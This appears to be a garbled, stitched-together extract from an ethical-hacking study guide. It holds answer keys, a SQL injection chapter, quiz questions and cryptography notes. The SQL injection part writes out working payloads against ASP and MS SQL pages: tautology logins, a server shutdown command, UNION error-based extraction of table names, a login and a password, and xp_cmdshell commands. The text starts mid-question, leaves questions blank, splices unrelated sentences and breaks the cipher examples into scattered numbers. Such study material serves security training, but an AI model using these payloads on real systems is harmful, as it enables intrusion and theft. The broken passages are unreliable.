b. 168.170.206.28
c. 161.182.205.28
d. 128.168.205.20
Answers
1.
Answer: b
HTTP resides in the Application Layer of the TCP/IP stack. It is a transport protocol that is used to
exchange information on the World Wide Web between an originating client or user agent such as
a Web browser and a destination or origin server. HTML is a language that supports developing
Web pages on the destination server.
2.
Answer: b
The correct statement for answer b should be The client browser processes the HTML tags and
presents the Web page on the client screen.
3.
Answer: a
4.
Answer: c
5.
Answer: c
Answer a, port 8080, is typically used for the Squid open-source Web proxy cache; answer b, port
443 is usually the default port of HTTPS using encrypted SSL or TLS; and answer d, port 88, is
often used for Kerberos.
6.
Answer: c
7.
Answer: a
8.
Answer: d
9.
Answer: c
10. Answer: a
11. Answer: c
Answer a, Web cracker, is used for authentication exploits; answer b, Superscan and Nmap, are
used for web server scanning; and answer d, SQLbf, is used in database attacks.
12. Answer: d
13. Answer: c
14. Answer: c
URL encoding is involved in a file system traversal attack.
15. Answer: a
16. Answer: b
17. Answer: c
18. Answer: b
19. Answer: c
20. Answer: a
File system traversal attack cannot take place across physically different drives.
21. Answer: c
22. Answer: d
23. Answer: b
24. Answer: c
25. Answer: a
Additional Apache attacks include PHP scripting and URL trailing slashes.
26. Answer: b
27. Answer: d
28. Answer: c
29. Answer: c
30. Answer: a
31. Answer: c
32. Answer: a
33. Answer: d
34. Answer: d
35. Answer: a
36. Answer: a
37. Answer: a
38. Answer: b
39. Answer: c
40. Answer: d
41. Answer: c
42. Answer: a
43. Answer: c
44. Answer: b
The correct answer is b because not installing a number of services and features by default is one
of the modifications made to IIS 6.0 to enhance security.
45. Answer: c
A popular and effective attack against database applications on web servers is known as SQL
injection. This type of attack takes advantage of SQL server vulnerabilities, such as lack of proper
input string checking and failure to install critical patches in a timely fashion.
Conducting an Attack
A simple example of an SQL injection attack is to use the single quotation mark or an identity such as
1=1 as part of an input value to a Web page. These values can be inserted into a login as follows:
-Login: ron'
-Login: 1=1SQL Server ignores everything after a - - because these characters are the single line comment
sequence in Transact-SQL. They are needed for inputs and queries to terminate without an error. The
; character denotes the end of an SQL query statement
The values can also be used with a URL, such as:
-http://page/index.asp?id=ron'
-http://page/index.asp?id=1=1One desired outcome of using a URL is to access an asp page that will link our query to another page
in the database. For example, the following URL contains a variable category of employee with the
value fulltime.
http://page/index.asp?employee=fulltime'
Note that the character ' was added to the value fulltime.
If the injection works as desired, this URL translates into the SQL command:
SELECT * FROM hrdata WHERE Employee='fulltime';
This command can initiate a query that will return not only the full-time employee data but all the other
data from the hrdata table in the database.
Another form of SQL injection is for the user to enter escape characters into parameters of an SQL
statement. This type of attack can then access database information. An example of this type of attack
is shown in the following code:
Statement:= "SELECT Username FROM Users WHERE Username = '" + Username +
"';"
This statement is designed to query a list of users for a specific entered user name. By manipulating
the username variable, an SQL injection can be initiated to do more than verify a users name. For
example, giving the username variable a value of h or 'y'='y results in the following SQL
statement:
SELECT Username FROM Users WHERE Username = 'h'or 'y'='y';
When the Username argument is evaluated, 'y'='y' will assess to TRUE, and an authentic
username will be returned.
A variation on this approach is to use the parameter $username = "' or username is not
null or username='". This statement will be executed as follows and provide the entries for all
users.
SELECT Username FROM Users WHERE Username='' or Username is not null or
Username='';
SQL server provides another command that can be used in SQL injection, namely:
shutdown with nowait
This command will terminate the server operation and implement an attack with the following
responses:
Username: ' ; shutdown with nowait; -Password [Leave blank]
If the SQL server is vulnerable, the following statement will be executed:
Select username from users where
provide the name of the first table in the database and the UNION statement will result in the SQL
server attempting to convert a character string to integer. This conversion will fail, and an error
message of the following type will be returned:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'employeetable' to a column of data type int.
/index.asp, line 6
While the error message provides the information that the string could not be converted to an integer,
it also provides the name of the first table in the database, namely employeetable. Then, by using
the following statement, the name of the next table in the database tables will be returned:
http://page/index.asp?id=20 UNION SELECT TOP 1 TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME not IN ('employeetable')-If you use the LIKE keyword in the following statement, additional information can be found:
http://page/index.asp?id=20 UNION SELECT TOP 1 TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'-The term '%25login%25 will be interpreted as %login% by the server. The resulting ODBC error
message would be as follows:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'sys_login' to a column of data type int.
/index.asp, line 6
The ODBC error message identifies a table name as sys_login.
The next step in this SQL injection attack would be to obtain a login name from the sys_login table.
This can be accomplished by the following statement:
http://page/index.asp?id=20 UNION SELECT TOP 1 login_name FROM
sys_login-The resulting ODBC error message provides the login name whiteknight from the sys_login
table:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'whiteknight' to a column of data type int.
/index.asp, line 6
To obtain the password for whiteknight, the following statement can be applied:
http://page/index.asp?id=20 UNION SELECT TOP 1 password FROM sys_login
where login_name='whiteknight'-The corresponding ODBC error message is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'rlkfoo3' to a column of data type int.
/index.asp, line 6
Thus, the password for whiteknight is revealed to be rlkfoo3.
Stored Procedures
SQL injection can also take advantage of stored procedures in a web server database. A stored
procedure is a group of SQL statements that is designed to perform a specific task. This approach is
an alternative to having the application layer construct SQL statements dynamically. A stored
procedure can be called by its name and can pass the required parameters to the procedure. An SQL
injection can be initiated if the stored procedure is not employed properly.
One useful procedure in this class is master.dbo.xp_cmdshell, which incorporates the following
syntax:
xp_cmdshell {'command_string'} [, no_output]
The argument 'command_string' is an SQL command.
An example of a stored procedure incorporating master.dbo.xp_cmdshell is the following
construction, which provides employee information from an employee name search:
CREATE PROCEDURE SP_EmployeeSearch @Employeename varchar(200) = NULL AS
DECLARE @sql nvarchar(2000)
SELECT @sql = ' SELECT EmloyeeNum, EmployeeName, Title, Salary ' +
' FROM Employee Where '
IF @EmployeeName IS not NULL
xp_makecab. Supports user generation of a compressed archive of files on the server and files
that can be accessed by the server
exec master..xp_cmdshell 'dir'. Provides a listing of the SQL Server process current
working directory
Custom extended stored procedures. Can also be developed to execute as part of the SQL
server code
MS ACCESS
MS SQL
SYS.USER_CATALOG
MSysACEs
syscolumns
SYS.USER_CONSTRAINTS
MsysQueries
sysobjects
MS ACCESS
SYS.USER_OBJECTS SYS.TAB
MsysObjects
SYS.USER_TAB_COLUMNS
MSysRelationships
MS SQL
SYS.USER_TABLES
SYS.USER_TRIGGERS
SYS.USER_VIEWS SYS.ALL_TABLES
A series of automated tools have been developed for finding SQL injection vulnerabilities and
supporting SQL injection attacks. A summary of a number of the popular SQL injection tools along
with a brief description of their function is given as follows:
Absinthe. This is an automated tool used to implement SQL injections and retrieve data from a
web server database. The Absinthe screen interface supports entering target data, such as the
URL, Web application injectable parameters, cookies, delays, speedups, and injection options.
The Absinthe screen interface is shown in Figure 14-1.
Automagic SQL. This is an automated injection tool for use against Microsoft SQL server that
supports applying xp_cmdshell, uploading database files, and identifying and browsing tables in
the database.
SSRS. Microsoft SQL Server Resolution Service is susceptible to buffer overflow attacks which
can lead to the server executing arbitrary code, elevating privileges, and compromising the web
server and database.
Osql. Although this utility has been replaced by sqlcmd, it is good to be aware of it. Osql interacts
with a web server using ODBC and supports entering script files, Transact-SQL statements, and
system procedures to the server database.
sqlcmd. This utility supports entering Transact-SQL statement, script files, and system
procedures in SQLCMD mode. It replaces Osql utility functions.
SQLDict. This application was developed on Visual FoxPro 8.0 and supports the access of a
variety of relational databases. It provides a common interface to execute SQL commands,
implement and test for dictionary attacks, browse and list database tables, display table
attributes, and export table attributes.
SQLExec. This database utility can be used with a variety of servers to display database tables
and fields and generate SQL commands for different functions. An SQLEXEC() function in Visual
FoxPro sends and executes an SQL command to a data source.
SQLbf. An SQL server brute force or dictionary password cracker, it can be used to decrypt a
password file or guess a password. It can also be used to evaluate the strength of Microsoft SQL
Server passwords offline.
SQLSmack. A Linux-based tool, it can execute remote commands on Microsoft SQL server. The
commands are executed through the master..xp_cmdshell but require a valid username and
password.
SQL2.exe. This UDP buffer overflow remote hacking tool sends a crafted packet to UDP port
1434 on the SQL Server 2000 Resolution Service. The buffer overflow can result in the execution
of malicious code in the server using the xp_cmdshell stored procedure.
SQLBlock. This utility functions as an ODBC data source and inspects SQL statements to
protect access to Web server databases. It will block dangerous and potentially harmful SQL
statements and alert the system administrator.
Acunetix Web Vulnerability Scanner (WVS). An automated scanner that can work in
conjunction with manual utilities to analyze Web applications for vulnerabilities, it can be used for
penetration testing.
WSDigger. This is an open source black box penetration testing Web services framework that
can test for cross site scripting, SQL injection and other types of attack vulnerabilities.
WebInspect. This is an automated tool that can be used to identify Web application
vulnerabilities by dynamically scanning these applications. As part of WebInspects vulnerability
analysis, this utility will check for and report SQL injection vulnerabilities.
Assessment Questions
You can find the answers to the following questions in Appendix A.
1.
Which one of the following is not a vulnerability that might make an SQL injection attack
possible?
a. Failure to install critical patches in a timely fashion
b. Running database applications from a low privilege account
c. Lack of strong typing
d. Not properly checking input strings
2.
Which one of the following is an SQL injection attack that identifies the database tables
and forms the basis for other attacks?
a. Database footprinting
b. Quoted injection
c. Database monitoring
d. Select injection
3.
4.
What is a standard database access method that provides the ability to access data from
any application, independent of the database management system (DBMS) being used?
a. Schema
b. SQL
c. ODBC
d. UNION
5.
6.
Testing a web server database for vulnerabilities is enhanced if a Web page has which one
of the following items?
a. Login boxes
b. Search boxes
c. HTML source code with FORM tags
d. All of the above
7.
An SQL statement with a space and the word OR added to the parameter value in the
query to determine if the database is susceptible to SQL injection is known by which one
of the following terms?
a. Auto injection
b. Indirect injection
c. Direct injection
d. Quoted injection
8.
9.
10. SQL server provides a command that will shut down the server and can be used to
implement an SQL injection attack. Which one of the following is that command?
a. close
b. shutdown with nowait
c. end with nowait
d. close with nowait
11. A successful SQL injection attack that occurs when a character string is inserted as a
variable in an SQL statement that is expecting an integer is a result of which one of the
following?
a. Character injection
b. Application of strong typing
c. Lack of strong typing
d. Privilege injection
12. If the character string 1;DROP TABLE TableName is inserted as a variable in an SQL
statement expecting an integer variable, which one of the following SQL injection attacks
will take place?
a. The table TableName will be deleted
b. The table TableName will be renamed
c. The table TableName will be modified
20. Which of the following is not a means of protecting against an SQL injection attack?
a. Filter inputs from cookies
b. Use stored procedures with embedded parameters through safe callable interfaces
c. Use dynamic SQL queries, if possible
d. Eliminate unnecessary accounts
21. Removing unnecessary stored and extended stored procedures is one measure that can
be used to protect against SQL injection attacks. Which one of the following procedures is
a good candidate to consider removing?
a. sp_makewebtask
b. xp_sendmail
c. master..xp_cmdshell
d. All of the above
22. What automated SQL injection vulnerability testing tool employs a screen interface to enter
target Web database information?
a. Absinthe
b. SSAS
c. Asql
d. SQLCheck
23. Which automated SQL injection utility has replaced Osql and supports entering TransactSQL statement, script files, and system procedures?
a. Absinthe
b. SQLDict
c. sqlcmd
d. SQLCheck
24. The string http://page/index.asp?id=20 UNION SELECT TOP 1 COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=salaries WHERE
COLUMN_NAME not IN ('ssnumber)-- results in an ODBC error message that provides
which one of the following?
a. The name of the next column after the salaries column in the table ssnumber
b. The name of the next column after the ssnumber column in the table salaries
c. The name of the next row after the ssnumber row in the table salaries
d. The name of the next row after the salaries row in the table ssnumber
25. The extended procedure exec master..xp_cmdshell 'net1 user performs
which one of the following functions?
a. Provides a directory tree
b. Provides a list of all computer users
c. Provides a list of available computer drives
d. Identifies server ODBC data sources
26. Which one of the following utilities is especially susceptible to buffer overflow attacks,
which can compromise the web server and database?
a. SSRS
b. Automagic SQL
c. SQLExec
d. SQLbf
27. Which application developed on Visual FoxPro 8.0 provides a common interface to
execute SQL commands, implements and tests for dictionary attacks, browses and lists
database tables, and displays table attributes?
a. WebInspect
b. SQLSmack
c. SQLDict
d. SQLBlock
28. Which one of the following is a SQL server brute force or dictionary password cracker that
is used to decrypt a password file or guess a password?
a. SQLExec
b. ASN
c. WebInspect
d. SQLbf
29. Which one of the following is an open source black box penetration testing Web services
framework that can test for cross site scripting, SQL injection and other types of attack
vulnerabilities?
a. WSDigger
b. SQLBlock
c. SQLSmack
d. Automagic SQL
30. Which one of the following is a utility that functions as an ODBC data source and inspects
SQL statements to protect access to web server databases? It will intercept dangerous
and potentially harmful SQL statements and alert the system administrator.
a. SQL2.exe
b. SQLbf
c. SQLSmack
d. SQLBlock
Answers
1.
Answer: b
This safeguard is one of the actions that should be taken to prevent SQL injection attacks.
2.
Answer: a
3.
Answer: d
4.
Answer: c
5.
Answer: a
6.
Answer: d
7.
Answer: c
8.
Answer: d
9.
Answer: a
10. Answer: b
11. Answer: c
12. Answer: a
13. Answer: c
14. Answer: b
15. Answer: a
16. Answer: c
17. Answer: a
18. Answer: d
19. Answer: a
20. Answer: c
The proper practice is to limit the use of dynamic SQL queries.
21. Answer: d
22. Answer: a
23. Answer: c
24. Answer: b
25. Answer: b
26. Answer: a
27. Answer: c
28. Answer: d
29. Answer: a
30. Answer: d
The most familiar form of cryptography is known as symmetric key (secret key or private key)
cryptography. In symmetric key cryptography, the sender and recipient are required to know a
common secret or key. The sender encrypts the message with the secret key or cryptovariable, as it is
sometimes called, to produce the ciphertext. Then, when the message is received by the recipient, he
or she applies the same secret key to the ciphertext to decrypt the message. Perhaps the most
important security issue in symmetric key encryption is the secure transmission of the secret key from
the sender to the recipient. If the secret key is compromised, the encrypted message can be read by
an unauthorized third party.
Substitution Cipher
The encryption effected by the Caesar cipher can be implemented numerically by using modulo 26
addition. In this method, the letters A to Z of the alphabet are given a value of 0 to 25. The messages
characters and repetitions of the key are added together, modulo 26. Therefore, two parameters have
to be specified for the key:
D, the number of repeating letters representing the key
K, the key
The following example illustrates a general substitution cipher using modulo 26 addition. In the
example, D = 3 and K = HAT:
The message is: NO TIME
Assigning numerical values to the message yields:
13 14
N
19 8 12 4
T I
M E
19
Now, the repetitive key of 7 0 19 is added to the letters of the message as follows:
7
0 19
0 19 Repeating Key
13
14 19
20
8 12
4 Message
In modulo 26 addition, any numerical equivalents equal to or greater than 26 are processed by
subtracting 26 from the sum and using the remainder as the number. The ciphertext in this example
would then become:
20
14
38
15
12
-26
23
20
14
12
________
15
12
23
Ciphertext Numbers
Translating these numbers back to their corresponding letters of the alphabet results in the following
ciphertext:
U
Ciphertext
For the Caesar cipher, D=1 and the key is the letter D, which is equivalent to the number 3.
Taking the same message as an example using the Caesar cipher yields the following:
3
13 14 19
3 3
Repeating Key
8 12 4
Message
16 17 22 11 15 7
Q
A ciphertext that is the result of a substitution algorithm can be attacked through frequency analysis.
In every language, there is a letter used more frequently than any other in a large sample of writing. In
the English language, this letter is e. The next most commonly used letters in order of frequency are t,
a, o, i, n, s, and r. Thus, when observing a large enough sample of ciphertext, the letter e can be
substituted for the ciphertext letter that appears most often. This substitution will give clues to other
letters and, eventually, the cipher can be broken.
This type of cryptanalysis is possible with a monoalphabetic or simple substitution cipher where a
character of ciphertext is substituted for each character of the plaintext. A more difficult cipher to break
uses a different alphabet for every letter substitution. This cipher is called a polyalphabetic cipher,
resulting in the same plaintext letter being converted into a different ciphertext letter during the
encryption process. Because multiple alphabets are used, this cipher cannot be attacked with
frequency analysis. It can, however, be attacked by discovery of the periods when the substitution
repeats.
INPUT B
OUTPUT
INPUT B
OUTPUT
Triple DES
Because of the weakness of DES, multiple encryptions with DES have been developed; however,
double encryption using DES is no more secure than using a single DES key. Three encryptions,
called Triple DES, can provide more secure encryption and can be implemented in a number of ways,
using different encryption keys. For example, a message can be encrypted with Key 1, decrypted with
Key 2 (essentially another encryption), and encrypted again with Key 1. These processes can be
denoted symbolically by the following representation, where E represents an encryption, D represents
a decryption, and the Ks indicate an encryption key:
[E{D[E(M,K1)],K2},K1]
This Triple DES encryption is known as DES-EDE2. Similarly, if three encryptions are performed with
three different keys, the process is identified as DES-EEE3 and is represented as follows:
E{E[E(M,K1)],K2},K3]
DES-EEE3 is considered the most secure of the Triple DES encryptions.
RC5/RC6
RC5 is a patented family of symmetric cryptographic algorithms with variable block lengths introduced
in 1994. The algorithms were developed by Ronald Rivest and support variable key lengths up to
2,048 bits with typical block sizes of 32, 64, or 128 bits. The RC6 cipher is an upgrade of RC5, and
operates at a faster speed than RC5.
a hybrid system makes use of the strength of both symmetric and asymmetric ciphers by using public
key cryptography to distribute safely the secret keys used in symmetric key cryptography.
Public key cryptography was advanced by a 1976 paper delivered by Dr. W. Diffie and Dr. M. E.
Hellman entitled New Directions in Cryptography (Whitfield Diffie and Martin Hellman, New
Directions in Cryptography, IEEE Transactions on Information Theory, Vol. IT-22, November 1976,
pp. 644654). In this paper, Diffie and Hellman described a secure method of exchanging secret keys
over a nonsecure medium. This approach is called the Diffie-Hellman key exchange and was the
precursor to public key cryptography.
One-Way Functions
One-way functions are used to generate the public key from the private key. They are called one-way
functions because it is easy to generate the public key from the private key, but very difficult to do the
reverse. In mathematical terms, if y = f(x), it would be easy to compute y if given x, but it would be
very difficult to derive x when given y. A typical example of a one-way function is searching the listings
in a telephone book. It is easy to find a number given a name, but difficult to find a name given the
phone number. Some one-way functions have a trap door. A trap door is a mechanism that easily
enables you to compute the reverse function in a one-way function.
RSA
The RSA public key cryptosystem was developed by Rivest, Shamir, and Addleman (R. L. Rivest, A.
Shamir, and L. M. Addleman, A Method for Obtaining Digital Signatures and Public-Key
Cryptosystems, Communications of the ACM, v. 21, n. 2, Feb 1978, pp. 120126). The initials of their
last names were used to identify the algorithm and also the information security company they
founded. RSA can be used for encryption, key exchange, and digital signatures.
The RSA public key algorithm is based on the difficulty of factoring a number, N, which is the product
of two large prime numbers. These prime numbers might be on the order of 200 digits each. In this
algorithm, the public key is generated from the private key from the product of two large prime
numbers. This multiplication is not difficult, but the reverse operation to find the private key from the
public key is very difficult. This reverse operation requires finding the prime factors of the product,
characterizing a hard, one-way function. In RSA, public and private keys are generated as follows:
1. Choose two large prime numbers, p and q, of equal length, and compute p q = n, which is
the public modulus.
2. Choose a random public key, e, so that e and (p 1)( q 1) are relatively prime. (Two numbers
are relatively prime when their greatest common divisor is 1.)
3. Compute e d = 1 mod (p 1)(q 1), where d is the private key.
4. Thus, d = e-1 mod [(p 1)(q 1)].
From these calculations, (d, n) is the private key, and (e, n) is the public key.
El Gamal
The Diffie-Hellman key exchange concepts were expanded by Dr. T. El Gamal to apply to encryption
and digital signatures. In his approach, El Gamal used the problem of finding the discrete logarithm of
a number as a hard, one-way function. El Gamal encryption is summarized as follows:
1. Given the prime number p and the integer g, Alice uses her private key, a, to compute her
public key as ya = gamodp.
2. For Bob to send message M to Alice:
a. Bob generates random number b < p.
b. Bob computes yb = gbmodp and ym = M XOR yab = M XOR gabmodp.
c. Bob sends yb, ym to Alice, and Alice computes yba = gabmodp.
3. Therefore, M = yba XOR ym = gabmodp XOR M XOR gabmodp.
The El Gamal public-key cryptosystem is not patented and is available for use by the public.
Digital Signatures
A digital signature is intended to provide at least the same protection and guarantees as obtained
when a person physically signs a document. Because data in digital, electronic form can be
processed, digital signatures also can be used to detect unauthorized modifications of a document.
According to the U.S. National Institute of Standards and Technology (NIST), Digital signatures are
used to detect unauthorized modifications to data and to authenticate the identity of the signatory. In
addition, the recipient of signed data can use a digital signature in proving to a third party that the
signature was in fact generated by the signatory.
Hash Function
Digital signature protections are accomplished by transforming a message or document into a smaller
representation that is uniquely bound to the original document. This binding means that if a change
is made in the original document, the resulting compressed representation will also change. In
computational terms, a digital signature is generated by passing the message or file to be transmitted
through a one-way hash function. The hash function produces a fixed size output, called a message
digest, from a variable size input using all of the original files data. The message digest is uniquely
derived from the input file. An ideal hash algorithm should have the following characteristics:
The original file cannot be recreated from the message digest.
Two files should not have the same message digest.
Given a file and its corresponding message digest, it should not be feasible to find another file
with the same message digest.
These characteristics are analogous to the following examples of a birthday attack on a hash function:
If you were in a room with other people, what would be the necessary sample size n of
individuals in the room to have a better than 50/50 chance of someone having the same birthday
as you? (The answer is 253.)
If you were in a room with other people, what would be the necessary sample size n of
individuals in the room to have a better than 50/50 chance of at least two people having a
common birthday? (The answer is 23, because with 23 people in a room, there are n(n - 1)/2 or
253 pairs of individuals in the room.)
In general, the SHA actually denotes five approved algorithms for generating a message digest. The
five algorithms are given the designations SHA-1, SHA-224, SHA-256, SHA-384, and SHA-512. The
later four hash algorithms are sometimes known as a group as SHA-2.
In the digital signature standard, SHA-1 is employed to generate a fixed-length message digest from a
variable length input file. The SHA-1 message digest is 160 bits long for any input file that is less than
2^64 bits. The SHA-1 algorithm processes input messages in block sizes of 512 bits.
MD5
MD5 is a hash function that generates a fixed length message digest of 128 bits from input files of
arbitrary length. Like the SHA-1 algorithm, MD5 processes the input file in blocks of 512 bits. MD5
was developed in 1991 by Ronald Rivest.
Digital Certificates
A digital certificate is a certification mechanism used to bind individuals to their public keys. A trusted
entity is needed to guarantee the public key is the valid public key of the associated person. This
entity is a certificate authority. A Certificate Authority (CA) acts as notary by verifying a persons
identity and issuing a certificate that vouches for the public key of the named individual. In order to
verify that the certification agent is not fraudulent, the certification agent signs the certificate with its
own private key. This certificate is then sent to a repository, which holds the certificates and Certificate
Revocation Lists (CRLs) that denote the revoked certificates
To verify the CAs signature, its public key must be cross-certified with another CA. Figure 15-2
illustrates the use of digital certificates in a transaction.
Figure 15-3: The format of the CCITT-ITU/ ISO X.509 digital certificate
As discussed earlier, a certificate that has expired or is invalid is put into a CRL to notify potential
users. The CRL is signed by the CA for authentication and preservation of integrity. Figure 15-4
illustrates a CRL for an X.509 version 2 certificate.
Cryptanalysis
Cryptanalysis is the act of deciphering an encrypted message without originally having the key.
Cryptanalysis could involve determining the secret key by some method or using a variety of
approaches to unscramble the message. Cryptanalysis is used to obtain valuable information and to
pass on altered or fake information in order to deceive the original intended recipient.
The common types of cryptanalysis attacks against cryptosystems are listed in Table 15-2.
ATTACK
DESCRIPTION
Known plaintext
The adversary has a copy of the plaintext corresponding to the ciphertext.
Chosen plaintext
Selected plaintext is encrypted and produces corresponding ciphertext output.
Brute force
The adversary conducts an exhaustive search of the key space until the correct key is found.
Ciphertext only
The ciphertext alone is available to the attacker.
Adaptive chosen plaintext
This is a form of a chosen plaintext attack where the selection of the plaintext is adjusted
depending on previous results.
Chosen ciphertext
The attacker attempts to decrypt selected ciphertext while having access to the corresponding
plaintext.
Adaptive chosen ciphertext
The attacker attempts to decrypt selected portions of ciphertext based on the results of previous
attempts.
Meet-in-the-middle
The adversary attacks double encryption schemes by encrypting known plaintext from one end
with each possible key (K) and comparing the results in the middle with the decryption of the
corresponding ciphertext with each possible K.
Linear cryptanalysis
The attacker generates a linear estimation of the key using pairs of known plaintext and
corresponding ciphertext.
Differential cryptanalysis
This attack is normally applied to block cipher symmetric key cryptographic systems. The
adversary looks at ciphertext pairs, which were generated through the encryption of plaintext pairs,
with specific differences, and analyzes the effect of these differences.
1.
2.
3.
4.
5.
6.
7.
8.
9.
1.
Answer: c.
ARTNIC does not exist. The other RIRs listed are: RIPE Network Coordination Centre (RIPE
NCC), African Network Information Centre (AfriNIC), and Latin American and Caribbean Internet
Address Registry (LACNIC).
2.
Answer: b
3.
Answer: a
4.
Answer: a
5.
Answer: b
Answer c is correct if the TTL reaches 0, but the router always decrements the TTL by 1 at each
hop.
6.
Answer: b
7.
Answer: a
8.
Answer: c
Linux uses UDP for its Traceroute; Windows uses ICMP.
9.
Answer: d
10. Answer: b
11. Answer: d
12. Answer: d
13. Answer: b
Traceroute is used to determine the route between the attacker and the target.
14. Answer: a
15. Answer: c
While the order of steps in information gathering is often varied, Whois is commonly the first step.
16. Answer: a
17. Answer: c
While not impossible, the other three choices are better suited for open searching.
18. Answer: b
19. Answer: a
20. Answer: d
21. Answer: c